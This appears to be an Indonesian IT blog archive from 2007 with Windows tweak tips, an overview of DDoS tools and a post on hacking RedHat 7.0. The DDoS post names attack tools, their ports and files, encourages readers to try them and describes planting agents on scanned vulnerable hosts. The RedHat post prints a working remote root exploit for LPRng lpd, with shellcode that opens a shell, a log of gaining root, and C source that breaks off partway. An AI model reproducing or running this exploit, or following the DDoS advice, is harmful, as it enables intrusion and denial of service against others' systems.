Tentang IT dan Komputer

Teknologi Informasi

Archive for July, 2007

Tips Mendisable Display di desktop

Posted by intrik on July 14, 2007

Bagaiamana rasanya bila wallpaper kesukaan Anda di desktop diganti oleh orang lain, atau screensaver diubah seenaknya tanpa izin/sepengetahuan kita. Pasti jengkel dan marah, bukan. Jangan biarkan keusilan teman Anda untuk mengotak-atik tampilan desktop kita. Oleh karena itu, Anda dapat mencegahnya dengan mendisable Display pada desktop. Selengkapnya download di sini aja, Mas

Advertisements

Posted in Tip & Trik | Leave a Comment »

tips Mendisable Control Panel

Posted by intrik on July 14, 2007

Lewat Control Panel, tanpa seizin/sepengetahuan kita, orang lain bisa mengubah settingan PC kita tanpa izin. Dengan control panel, orang bisa meremove program, membuat user account dan masih banyak lagi. Oleh karena itu, demi keamanan, Anda bisa mendisable Control Panel pada Menu Start. Selengkapnya harus didownload wonten mriki mawaon


Posted in Tip & Trik | Leave a Comment »

Tips Menampilkan Kembali Folder Option

Posted by intrik on July 14, 2007

Pernahkan Anda jumpai Folder Option pada Windows Explorer “hilang?” Kalau pernah kemungkinan ada virus di PC Anda yang bikin ulah. Virus sengaja menghilangkannya agar kita tidak bisa merubah option (settingan) tertentu pada Folder Option tersebut. Selengkapnya, monggo download di sini

Posted in Tip & Trik | Leave a Comment »

menghilangkan Folder Option di Windows Explorer

Posted by intrik on July 14, 2007

Kadang-kadang karena alasan tertentu (misalnya kerahasiaan atau keamanan), kita bisa merubah attribute file menjadi hidden agar orang lain tidak bisa mengetahui/melihatnya. Jika demikian yang Anda inginkan maka Anda harus memilih option Do not show hidden files or folders pada Folder Option tab view. Dengan demikian file yang kita hidden tidak nampak dalam Windows explorer. Selengkapnya ya, download di sini

Posted in Tip & Trik | Leave a Comment »

Membatasi hak akses drive pada My Computer

Posted by intrik on July 14, 2007

Apakah PC Anda sering digunakan anak atau isteri Anda? Atau bahkan sering Anda pinjamkan kepada orang lain? Mungkin saja Anda punya data penting yang tidak boleh diketahui oleh orang lain atau tidak boleh diakses oleh anak seusia anak Anda. Bagaimana jika Anda sering membawa pulang pekerjaan kantor berupa data/file penting yang orang lain tidak boleh mengetahuinya?

Anda dapat membatasi/mencegah hak akses terhadap drive tertentu tempat Anda menyimpan data/file penting Anda dengan hanya beberapa langkah saja. Jika orang lain berusaha mengKLIKnya maka akan muncul seperti gambar di atas.

Silakan download di sini

Posted in Tip & Trik | Leave a Comment »

Bagian II Tips Mengubah Tampilan Dekstop FlashDisk

Posted by intrik on July 14, 2007

Bagaimana jika kita ingin mengubah warna teks ? Nah anda tinggal sedikit memodifikasi isi file desktop.ini milik Monica. Cari bagian yang bertuliskan

IconArea_Text=0xcc00aa

cc00aa adalah kode hexa untuk warna ungu. Jadi jika anda ingin mengubah warna teks dari ungu menjadi warna lain, anda tinggal mengubah cc00aa menjadi kode hexa untuk warna yang lainnya. Misal, anda ingin mengubah warna teks menjadi warna putih maka ganti 0xcc00aa menjadi ffffff. Maka hasilnya seperti :

IconArea_Text=0xffffff

Ffffff adalah kode hexa untuk warna putih.Bila anda tidak tahu atau tidak hapal kode hexa, anda dapat melihatnya pada frontpage. Caranya, klik pada Font Color (dropdown menu) lalu pilih More Color… lalu klik pada warna yang anda inginkan lalu lihat pada Value, maka akan terlihat kode hexa untuk warna yang anda pilih. Misal, warna putih, maka akan terlihat : Hex={FF,FF,FF} , maka kode hexa warna putih adalah FFFFFF. Itu tadi hanya mengubah warna teks. Oh ya pada artikel Monica, hanya mengajarkan bagaimana cara mengganti gambar background yang file gambarnya tidak berada dalam folder. Bagaimana bila gambar milik kita ada dalam folder ? Gampang ! ganti saja (misal, gambar bernama cover.jpg dan berada dalam folder gambarku) :

IconArea_Image=cover.jpg

Menjadi

IconArea_Image=\gambarku\cover.jpg

Nah, gampang khan ?.

*Last Word*
Bukannya saya sok pintar atau sok jago, saya hanya ingin membagi pengalaman dengan teman-teman semua. Untuk itu saya mohon maaf bila artikel ini dianggap jelek atau kurang bermutu. Untuk Monica Octavia, saya mohon maaf bila artikel ini dianggap kurang berkenan, saya hanya ingin melengkapi saja dan tidak bermaksud sok pintar dan sok jago. Bila ada teman-teman yang mau berbagi pengalaman masalah hack , crack atau virus hubungi saya di irzan@postmaster.co.uk
Sampai Jumpa !!! Irzan

Posted in Tentang Flashdisk | Leave a Comment »

Distributed Denial of Service(DDOS) Attacks

Posted by intrik on July 14, 2007

Anda Perlu Informasi Serangan Hacker ke Yahoo! MSN, CNN, Buy.com, eBay and Amazon.com ?

1 Apakah itu DDOS ?
2 Definisi Denial of Service Attacks
3 Distributed Denial of Service (DDOS) Attacks.
4 Mengapa Serangan DDOS menjadi sangat populer ?
5 Efek dari serangan DDOS
6 Teknikal overview dari aplikasi DDOS

  1. Apakah itu DDOS ?

Sampai dengan sekarang ini pengertian tetang DDOS adalah seperti yang anda dengarkan beberapa waktu yang lalu mengenai serangan terhadap web site Yahoo! MSN, CNN, Buy.com, eBay dan Amazon.com. Informasi terkini yang didapat kan adalah bahwa serangan hacker itu berasal dari West Coast, United States (Oregon dan California). Dari laporan FBI menuliskan bahwa serangan ini melibatkan beberapa network dari universitas yang ada di daerah tersebut yaitu Stanford, state California dan Santa. Barbara. Pada whitepaper ini akan dibahas sekilas mengenai cara serangan para hacker tersebut ke beberapa web site yang disebutkan di atas.

  1. Definisi Denial of Service Attacks

Serangan Denial of Service(DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood nya.

Serangan seperti ini juga dapat menghancurkan seluruh host dengan mengakibatkan “kernel panic” pada Linux dan keluarga UNIX lainnya atau lebih umumnya the “blue screen on death” nya Windows NT dan 98.

Serangan DOS ini dapat ditujukan dengan lebih spesifik terhadap services yang ada, contohnya seperti host Web Server dan fungsi dari Network Interface Card (NIC).

Bahkan yang lebih menyenangkan lagi si penyerang menargetkan serangan khusus pada network environment seperti network bandwith dengan menciptakan network request imitasi sehingga terjadi network bussy atau istilah yang lebih familiarnya bottleneck (yang pasti bandwith networknya menjadi full of waste ). Seperti anda ketahui bahwa bandwith adalah bagian yang sangat esensial dari koneksi internet (saluran ke internet). Dengan memenuhi saluran tersebut dengan infomasi sampah(network request imitasi) si penyerang dapat dengan bebas menguasai network bandwith yang masih available. Serangan DOS terakhir yang terjadi adalah pada tgl 7 January 2000.

Serangan DOS ini telah ada pada tahun 1988 yaitu Robert Moris Internet Worm, Melissa virus yang terkenal pada tahun dan masih banyak lagi kejadian DOS pada network dan perusahaan yang tidak diketahui.

Meskipun hal-hal ini disebabkan oleh worm, virusdan beberapa macam dari program yang ada, semua ini terjadi dengan cara yang sama yaitu : satu host menyampaikan informasi atau berkomunikasi dengan host lainnya dan kemudian secara efektif menghancurkan korban dengan mengirim segudang informasi yang tidak dapat di tanggani oleh korban itu sendiri.

  1. Serangan Distributed Denial of Service (DDOS).

Perlu digariskan disini bahwa DOS dan DDOS adalah beda. DOS adalah serangan hanya dengan satu node sedangkan DDOS yaitu dengan beberapa node.

Pada tahun 1998 kemajuan dari DOS yang tradisional terlihat dari 3 konsep baru serangan yaitu :

    1. Serangan dengan melalui beberapa host.
    2. Serangan dengan koordinasi diantara banyak individu yang ada (member dari pemakai network=internet)
    3. Serangan dengan menggunakan distribusi system dimana hal ini untuk mencoba membuat bingung jalan menuju ke titik pusat serangan(lihat gambar).

Si penyerang (titik pusat) menyerang host yang ada. Host tersebut tidak berkomunikasi secara langsung dengan korban. Host tersebut adalah administrator yang mengontrol dalam network mereka sendiri yang terdiri dari “Master” dan “Daemon”.

Si penyerang dapat mengontrol/menguasai satu atau bahkan lebih node master tersebut. Master node secara umum akan mengontrol beberapa bahkan lusinan node daemon, yang kemudian akan di alamatkan ke targer/korban.Maka serangan yang dihasilkan akan berupa “packet storm” yang dapat menghancurkan host atau bandwith dari network tersebut.

Keuntungan dan perspektif sebagai hacker dengan menggunakan serangan DDOS yang dapat dilihat disini adalah :

    • Si Penyerang dapat menggunakan ratusan system untuk menghancurkan korban.

Serangan tersebut menghasilkan kiriman “packet” yang sangat besar dan dengan cepat dapat menghancurkan korban(target host).

Jika network atau host dapat diatur/dimanage dengan sukses dengan serangan ini, maka dapat anda bayangkan betapa besar koneksi yang digunakan oleh sebuah network dapat dihancurkan dengan serangan DDOS ini. Jadi semakin besar suatu jaringan maka akan semakin besar pula serangan yang ada(menyenangkan bukan ?).

Contoh kasus dapat anda lihat yaitu Yahoo! Dan eBay, perusahaan seperti ini menggunakan kompleks server yang disebut sebagai “cluster servers” dimana mereka bertujuan dengan memberikan service yang OK kepada pelanggan(bandwith yang OK dalam hal ini).

Jadi dapat dilihat disini bahwa system yang “robust”(seperti banyak tertulis dalam produk Microsoft) dan system yang “well-managed” pun dapat dengan mudah dihancurkan dengan system serangan seperti ini. (tertarik anda untuk mencoba ?)

    • Tidak hanya programming kita dapat menggunakan multi tier desain tapi dalam hacking pun ada desainnya. Dalam struktur multi tier ini korban akan sangat sulit melacak titik pusat dari serangan tersebut.

Sejauh ini sangat penting untuk dimegerti bahwa sebagian besar dari operator dari host dimana master dan daemon itu berada merupakan bagian pendukung dari DOS ini. Hal ini terjadi karena hacker telah berhubungan dengan master dan daemon node dimana mereka telah menginstall software DOS ini tanpa sepengetahuan pemilik host/administrator/operatornya. Seandainya si korban dapat melacak daemon host sekalipun, pemilik/operator dari host tsb tidak dapat memberikan informasi yang cukup untuk meneruskan upaya ini.

  1. Mengapa Serangan DDOS menjadi sangat populer ?

Beberapa jawabannya dapat anda lihat dibawah ini :

    • Banyak Operating System dan aplikasi yang memberikan kemudahan dalam instalasi sehingga memberikan beberapa keuntungan seperti menghemat waktu mempelajarinya dan bahkan tidak perlu seorang ahli IT dalam mengoperasikannya. Maka akan sangat sulit bagi mereka untuk memberikan sekuriti kepada system yang mereka install secara otomatis tsb. Bukankah lebih mudah menginstall suatu program atau aplikasi dengan menggunakan default setting yang sudah ada. Contohnya dapat anda lihat pada system BII dan Bank Bali(segera di publish) di site Jasakom ini.
    • Banyak dari network environment bernasis pada single operating system. Contohnya jika menggunakan NT semuanya atau Linux di seluruh network environment. Router Cisco, dimana secara merata cara setting nya adalah sama di semua tempat.
    • Arsitektur internet yang alami secara mendasar memang sangat tidak secure dan memerlukan lingkungan kerja yang complex, mahal dan banyak menghabiskan waktu.
    • Software yang semakin komplex. Kompleks dalam hal ini adalah mengenai source code sehingga hole-hole yang ada dapat di exploit oleh hacker. Contohnya saja seperti Microsoft yang banyak service packnya itu.
    • Software yang ada semakin powerful. Dimana software-software yang ada dapat diakses tanpa harus dengan pengetahuan yang terlalu luas.
    • Kemajuan internet telah membawa banyak user yang tidak berpengalaman ikut serta dalam lingkungan networking sehingga akan lebih mudah bagi mereka untuk “misconfigured” system daripada memberikan keuntungan bagi system tsb.
    • Serangan tsb sulit dilacak. Karena perlu waktu yang berhari-hari bahkan bulanan sehingga si penyerang sudah relatif lepas hari kesalahan yang ada.

5. Efek dari serangan DDOS

Secara umum end user atau korban serangan DDOS ini hanya sadar bahwa serangan seperti in hanya merupakan gangguan yang memerlukan restart system. Tetapi bagaimanapun juga hal seperti ini akan menggangu bisnis yang sedang dijalankan apalagi bisnis yang sangat tergantung kepada system di internet.
Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai tujuannya yang telah ditargetkan. Jadi hacker tsb tidak hanya iseng mengadakan serangan DOS ini.
Contohnya adalah jika hacker tsb ingin menyerang Host B maka ia harus menggunakan computer A sebagai alat utk membingungkan korban dalam tracking si penyerang. Dan host A harus mempunyai trust relationship ke host B.

Tehnikal overview dari aplikasi DDOS

Berikut ini akan dibahas secara tehnikal software yang digunakan untuk melancarkan serangan DDOS ini. Mungkin pembahasan ini dapat digunakan sebagai bahan dalam memproteksi diri.

Disini kami hanya membahas 4 macam software dari yang sangat banyak di underground (sama seperti di film Matrix) maaf jika anda berpikir saya terlalu berfantasi (I am TheDreamer)

§ The Tribal Flood Network (TFN)

TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood connection dengan menggunakan protocol yang ada pada TCP/IP :

o UDP : difokuskan pada domain name system dan network management program.

o TCP : pusat e-mail dan web transaksi

o ICMP : digunakan oleh para professional untuk troubleshooting network

Nama program masternya adalah : tribe.c dan program daemon bernama td.c

§ Trin00

Software ini menggunakan UDP untuk mengirimkan flood packets network dengan menggunakan UDP. Port yang digunakan adalah :

Attack to Master : TCP Port 27665

Master to Daemon : UDP Port 27444

Daemon to Master(s) : UDP Port 31335

Program master : master.c

Program Daemon : ns.c

Sebagai saran, program ini tidak bagus untuk digunakan karena master dan daemon berhubungan dengan clear text.

§ Stacheldraht

Program ini cukup ok dan masih baru lho. Nama program ini dalam bahasa Jerman yang berarti “Barb Wire” kenal kan dengan film Barb Wire si Pamela Anderson (Big Tit women). Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup bahaya tapi keren banget.

Port TCP : 16660 dan 60001

Master program bernama : mserv.c

Daemon program bernama : td.c

Program ini memiliki client yang juga sebagai telnet : client.c

Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.

§ TFN2K

Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.

Software DDOS lainnya yang dapat saya sebutkan disini adalah paket seperti bliznet, dscan dan saltine cracker. Dscan adalah software yang dapat scanning distribusi operating system dan cukup sulit untuk di lacak dalam penggunaannya. Sedangkan yang lebih keren lagi adalah saltine cracker suite yang dapat menembus password untuk site-site yang perlu authentication.

Dari ke-4 software di atas yang disebutkan kecuali Stacheldraht setiap software di atas memiliki aplikasi master dan daemon seperti yang telah dibahas sebelumnya diatas.

Sedangkan Stacheldraht memiliki client yang hampir sama dengan telnet. Dimana hacker dapat mengontrol ratusan PC hanya dengan component dari software tsb. Cara kerja dari component ini adalah seperti membuat cabang ke client software(cthnya seperti Windows 98 yang sudah memiliki Telnet client sendiri), jadi hacker dapat mengontrol master dan client.

Hal-hal dan sifat-sifat yang menarik dari kesamaan ke –4 software di atas adalah sbb :

Mudah di instalasi dan di gunakan.(Buruan deh dicoba)
Tidak mudah dilacak jika digunakan, seperti pesawat hantu USA “Stealth” yang tidak dapat di deteksi oleh radar.
Selain dari TFN2K, software lainnya tsb bekerja pada system UNIX. Aslinya software tsb di compiled untuk system Solaris tetapi sekarang telah ada yang dibuat untuk platform lainnya seperti Linux dan Windows NT.
Master dan Daemon selalu diproteksi dengan password.
Pada Master component list dapat di daftarkan dengan mudah daemon yang ingin ditambahkan ke dalamnya.
Setiap DDOS aplikasi memiliki sign tersendiri, sehingga akan adanya kemungkinan untuk mendefinisikan master atau daemon yang telah diinstall di komputer anda.

Bagaimana menginstalasi program DDOS

Untuk menginstalasi program DDOS ini, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security adalah dengan cara yang sangat mudah. Gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security. Satu hal yang cukup menarik adalah software client tsb dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan.

Hal ini dikarenakan dapat ditrace dengan mudah host yang menyerangnya.
Deteksi terhadap keberadaan installasi DDOS software
Dalam hal ini belum ditemukan tools yang paling OK dalam mendeteksi program DDOS ini.
Hal ini karena program DDOS masih menggunanakan system client-server yang masih tradisional. Program tsb menggunakan port tertentu pada saat aktif sehingga untuk dapat mencegah hal ini maka anda hanya dapat mencari port yang open untuk di closed dengan menggunakan perintah netstat.

Anda juga dapat menggunakan perintah find / -name client, tetapi tentu saja anda sudah tahu program client yang diinstall pada komputer anda.

Banyak dari program DDOS lebih banyak menggunakan fasilitas crontab UNIX yang secara automatic menjalankan aplikasi. Dalam hal seperti ini maka perlu check crontab apakah ada file yang termasuk dalam file-file yang perlu dicurigai sebagai client dari program DDOS ini.

Program yang dapat dipakai untuk mendeteksi program DDOS ini adalah
RID yang ditulis oleh si hacker Mixter (pembuat TFN dan TFN2K), anda dapat mencarinya di internet dengan mudah.
Sickenscan yang dapat mendeteksi password default dari program Stacheldraht.
Trin00killer adalah untuk me-remove program trin00 master dan daemonnya.

(ruthness)

 

(C)2000 Webmaster of Jasakom All rights reserved

Source: JASAKOM Information Center

Posted in Hacking | Leave a Comment »

Hacking Ke RedHat 7.0

Posted by intrik on July 14, 2007

Menjelang tahun baru 2001, Redhat versi terbaru, yaitu RedHat 7.0 mendapat tamparan yang cukup kencang dari kelompok security netcat. kelompok ini membuat sebuah program yang mampu meng-exploit security bug yang terdapat pada lpd dimana pada bug ini memungkinkan remote user untuk mendapatkan root akses.
Berikut adalah percobaan yang telah dilakukan oleh pihak jasakom dalam menggunakan exploit yang telah di sebar luaskan pada security team di internet pada jam 3 pagi waktu indonesia. Pihak jasakom yang menggunakan RedHat 7.0 dengan port lpd yang terbuka melakukan exploit pada web server di lab jasakom. Pada bug yg obatnya ada di http://www.redhat.com/support/errata/RHSA-2000-065-06.html atau updatenya di ftp://updates.redhat.com/7.0/i386/LPRng-3.6.24-2.i386.rpm ftp://updates.redhat.com/7.0/SRPMS/LPRng-3.6.24-2.src.rpm
diperkirakan akan banyak dipakai oleh orang-orang tidak bertanggung jawab dalam melakukan deface ke web server.

Berikut adalah hasil percobaan dari pihak jasakom :
[root@localhost /test]# ls
SEClpd.c.txt SElpd SElpd.c saint
[root@localhost /test]# ./SElpd 127.0.0.1 -t 0
+++ http://www.netcat.it remote exploit for LPRng/lpd

+++ Exploit information
+++ Victim: 127.0.0.1
+++ Type: 0 – RedHat 7.0 – Guinesss
+++ Eip address: 0xbffff3ec
+++ Shellcode address: 0xbffff7f2
+++ Position: 300
+++ Alignment: 2
+++ Offset 0

+++ Attacking 127.0.0.1 with our format string
Argh exploit failed$#%! try brute force!

Percobaan pertama gagal, kemudian dilakukan exploit dengan menggunakan brute dan inilah hasilnya :

[root@localhost /test]# ./SElpd 127.0.0.1 brute -t 0
+++ http://www.netcat.it remote exploit for LPRng/lpd

+++ Exploit information
+++ Victim: 127.0.0.1
+++ Type: 0 – RedHat 7.0 – Guinesss
+++ Eip address: 0xbffff3ec
+++ Shellcode address: 0xbffff7f2
+++ Position: 300
+++ Alignment: 2
+++ Offset 0

+++ Attacking 127.0.0.1 with our format string
+++ Brute force man, relax and enjoy the ride ;>
+++ The eip_address is 0xbffff3d8

– [+] shell located on 127.0.0.1
– [+] Enter Commands at will

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:16:55 EDT 2000 i586 unkno
wn
uid=0(root) gid=7(lp)
ls      
<- Bingo !!! anda telah berhasil
bin
boot
dev
etc
home
lib
lost+found
misc
mnt
opt
proc
root
sbin
test
tmp
usr
var
cd etc
ls
CORBA
DIR_COLORS
Muttrc
X11
adjtime
aliases
aliases.db
anacrontab
at.deny
auto.master
auto.misc
bashrc
cdrecord.conf
conf.linuxconf
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
csh.cshrc
csh.login
default
dhcpc
dhcpcd
dumpdates
enscript.cfg
esd.conf
exports
fdprm
filesystems
fnrc
fstab
ftpaccess
ftpconversions
ftpgroups
ftphosts
ftpusers
gettydefs
gnome
gpm-root.conf
group
group-
gshadow
gshadow-
gtk
gtk-2.0
host.conf
hosts
hosts.allow
hosts.deny
httpd
identd.conf
im
im_palette-small.pal
im_palette-tiny.pal
im_palette.pal
imrc
info-dir
init.d
initlog.conf
inittab
inputrc
ioctl.save
isapnp.gone
isdn
issue
issue.net
krb5.conf
lam
ld.so.cache
ld.so.conf
ldap.conf
lilo.conf
localtime
login.defs
logrotate.conf
logrotate.d
lpd.conf
lpd.perms
ltrace.conf
lynx.cfg
mail
mail.rc
mailcap
makedev.d
man.config
mc.global
mesa.conf
mgetty+sendfax
midi
mime-magic
mime-magic.dat
mime.types
minicom.users
modules.conf
motd
mtab
mtools.conf
my.conf
news
nmh
nsswitch.conf
odbc.ini
odbcinst.ini
openldap
opt
pam.d
pango
paper.config
passwd
passwd-
passwd.OLD
pbm2ppa.conf
pcmcia
php.ini
pine.conf
pine.conf.fixed
pluggerrc
pnm2ppa.conf
ppp
printcap
profile
profile.d
protocols
pwdb.conf
rc
rc.d
rc.local
rc.news
rc.sysinit
rc0.d
rc1.d
rc2.d
rc3.d
rc4.d
rc5.d
rc6.d
redhat-release
resolv.conf
rmt
rpc
rpm
rpmlint
samba
sane.d
screenrc
securetty
security
sendmail.cf
sensors.conf
services
shadow-
shells
skel
smrsh
snmp
sound
squid
ssh
sysconfig
sysctl.conf
syslog.conf
termcap
updatedb.conf
uucp
wgetrc
xinetd.conf
xinetd.d
yp.conf
ypserv.conf
pwd            
<- melihat direktory
/etc

Berikut adalah program yang digunakan. Semoga anda tidak melakukan hal-hal yang merusak denganya, karena pihak jasakom tidak bertanggung jawab atas code ini 😉


/*
*
* http://www.netcat.it Presents: LPRng/Linux remote root lpd exploit.
*
* NetCat.it – admin@netcat.it
*
* Please Sysadmin Patch your Box!
* Please RedHat.com, release a patch!
*
* Run: ./SEClpd victim brute -t type
* Try first ./SEClpd victim -t 0 then try the brute.
*
* This exploit can be download from http://www.netcat.it
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define ADDRESS_BUFFER_SIZE 32+4
#define APPEND_BUFFER_SIZE 52
#define FORMAT_LENGTH 512-8
#define NOPCOUNT 200
#define SHELLCODE_COUNT 1030
#define DELAY 50000 /* usecs */
#define OFFSET_LIMIT 5000

char shellcode[] =

“\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80”
“\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8”
“\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89”
“\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0”
“\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd”
“\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9”
“\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75”
“\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08”
“\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh”;

struct target
{
char *os_name;
u_long eip_address;
u_long shellcode_address;
unsigned int position;
int written_bytes;
int align;
};

struct target targets[] =
{
{ “RedHat 7.0 – Guinesss “, 0xbffff3ec, 0L, 300, 70, 2, },
{ “RedHat 7.0 – Guinesss-dev”, 0xbffff12c, 0L, 300, 70, 2, },
{
NULL, 0L, 0L, 0, 0, 0
}
};

static char address_buffer[ADDRESS_BUFFER_SIZE+1];
static char append_buffer[APPEND_BUFFER_SIZE+1];
static char shellcode_buffer[1024];
static char *hostname=NULL;
static int offset;
static struct hostent *he;
int type=-1;
int brute=-1, failure=1;

void calculate_rets(u_long eip_addr, u_long shellcode_addr, u_int previous, u_int addr_loc)
{
int i;
unsigned int tmp = 0;
unsigned int copied = previous;
unsigned int num[4] =
{
(unsigned int) (shellcode_addr & 0x000000ff),
(unsigned int)((shellcode_addr & 0x0000ff00) >> 8),
(unsigned int)((shellcode_addr & 0x00ff0000) >> 16),
(unsigned int)((shellcode_addr & 0xff000000) >> 24)
};

memset (address_buffer, ”, sizeof(address_buffer));
memset (append_buffer, ”, sizeof(append_buffer));

for (i = 0; i < 4; i++)
{
while (copied > 0x100)
copied -= 0x100;

if ( (i > 0) && (num[i-1] == num[i]) )
sprintf (append_buffer+strlen(append_buffer), “%%%d$n”, addr_loc+i);
else if (copied < num[i])
{
if ( (num[i] – copied) <= 10)
{
sprintf (append_buffer+strlen(append_buffer), “%.*s”,
(int)(num[i] – copied), “www.netcat.it”);
copied += (num[i] – copied);
sprintf (append_buffer+strlen(append_buffer), “%%%d$n”, addr_loc+i); } else {
sprintf (append_buffer+strlen(append_buffer), “%%.%du”,
num[i] – copied);
copied += (num[i] – copied);
sprintf (append_buffer+strlen(append_buffer), “%%%d$n”, addr_loc+i); }
} else {
tmp = ((num[i] + 0x100) – copied);
sprintf (append_buffer+strlen(append_buffer), “%%.%du”, tmp);
copied += ((num[i] + 0x100) – copied);
sprintf (append_buffer+strlen(append_buffer), “%%%d$n”, addr_loc+i);
}

sprintf (address_buffer+strlen(address_buffer), “%c%c%c%c”,
(unsigned char) ((eip_addr+i) & 0x000000ff),
(unsigned char)(((eip_addr+i) & 0x0000ff00) >> 8),
(unsigned char)(((eip_addr+i) & 0x00ff0000) >> 16),
(unsigned char)(((eip_addr+i) & 0xff000000) >> 24));
}

while (strlen(address_buffer) < ADDRESS_BUFFER_SIZE)
strcat (address_buffer, “X”);

#ifdef DEBUG
printf (“\nGeneration complete:\nAddress: “);
for (i = 0; i < strlen(address_buffer); i++)
{
if ( ((i % 4) == 0) && (i > 0) )
printf (“.”);
printf (“%02x”, (unsigned char)address_buffer[i]);
}
printf (“\nAppend: %s\n”, append_buffer);
#endif

return;
}

char *create_malicious_string(void)
{
static char format_buffer[FORMAT_LENGTH+1];
long addr1,addr2;
int i;

memset (format_buffer, ”, sizeof(format_buffer));

targets[type].shellcode_address = targets[type].eip_address + SHELLCODE_COUNT;

addr1 = targets[type].eip_address;
addr2 = targets[type].shellcode_address;
calculate_rets (addr1, addr2,targets[type].written_bytes, targets[type].position);

(void)snprintf (format_buffer, sizeof(format_buffer)-1, “%.*s%s”,
targets[type].align, “BBBB”, address_buffer);

strncpy (address_buffer, format_buffer, sizeof(address_buffer)-1);
strncpy (format_buffer, append_buffer, sizeof(format_buffer)-1);

for(i = 0 ; i < NOPCOUNT ; i++)
strcat(format_buffer, “\x90”);

strcat(format_buffer, shellcode);

return (format_buffer);
}

int connect_victim()
{

int sockfd, n;
struct sockaddr_in s;
fd_set fd_stat;
char buff[1024];

static char testcmd[256] = “/bin/uname -a ; id ;\r\n”;

s.sin_family = AF_INET;
s.sin_port = htons (3879);
s.sin_addr.s_addr = *(u_long *)he->h_addr;

if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
printf (“— [5] Unable to create socket!\n”);
printf(“Exploit failed!\n”);
return -1;
}

if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)
{
return -1;
}

if(brute)

printf(“+++ The eip_address is 0x%x\n\n”, targets[type].eip_address);

printf(“- [+] shell located on %s\n”, hostname);
printf(“- [+] Enter Commands at will\n\n”);

failure = -1;

FD_ZERO(&fd_stat);
FD_SET(sockfd, &fd_stat);
send(sockfd, testcmd, strlen(testcmd), 0);

while(1) {

FD_SET(sockfd,&fd_stat);
FD_SET(0,&fd_stat);

if(select(sockfd+1,&fd_stat,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sockfd, &fd_stat) ) {
if((n=read(sockfd,buff,sizeof(buff)))<0){
fprintf(stderr, “EOF\n”);
return 2;
}

if(write(1,buff,n)<0)break;
}
if ( FD_ISSET(0, &fd_stat) ) {
if((n=read(0,buff,sizeof(buff)))<0){
fprintf(stderr,”EOF\n”);
return 2;
}

if(send(sockfd,buff,n,0)<0) break;

}
}
}

void send_code(char *exploit_buffer)
{

int sockfd, n;
struct sockaddr_in s;
fd_set fd_stat;
char recv[1024];
static char testcmd[256] = “/bin/uname -a ; id ;\r\n”;

s.sin_family = AF_INET;
s.sin_port = htons (515);
s.sin_addr.s_addr = *(u_long *)he->h_addr;

if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
printf (“— [5] Unable to create socket!\n”);
printf(“Exploit failed!\n”);
exit(-1);
}

if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)
{
printf (“— [5] Unable to connect to %s\n”, hostname);
printf(“Exploit failed, %s is not running LPD!\n”, hostname);
exit(-1);
}

usleep(DELAY);

if(write (sockfd, exploit_buffer, strlen(exploit_buffer)) < 0)
{
printf (“Couldn’t write to socket %d”, sockfd);
printf (“Exploit failed\n”);
exit(2);
}

close(sockfd);
connect_victim();

}

void usage(char *program)
{

int i=0;

printf(“SEClpd by http://www.netcat.it ! \n\n”);
printf(“Usage: %s victim [\”brute\”] -t type [-o offset] [-a align] [-p position] [-r eip_addr] [-c shell_addr] [-w written_bytes] \n\n”, program);
printf(“ie: ./SEClpd localhost -t 0 For most redhat 7.0 boxes\n”);
printf(“ie: ./SEClpd localhost brute -t 0 For brute forcing all redhat 7.0 boxes\n”);
printf(“Types:\n\n”);

while( targets[i].os_name != NULL)
printf (“[ Type %d: [ %s ]\n”, i++, targets[i].os_name);
}

int main(int argc, char **argv)
{

char exploit_buffer[1024];
char *format = NULL;
int c, brutecount=0;

if(argc < 3)
{
usage(argv[0]);
return 1;
}

hostname = argv[1];

if(!strncmp(argv[2], “brute”, 5)) brute = 1;

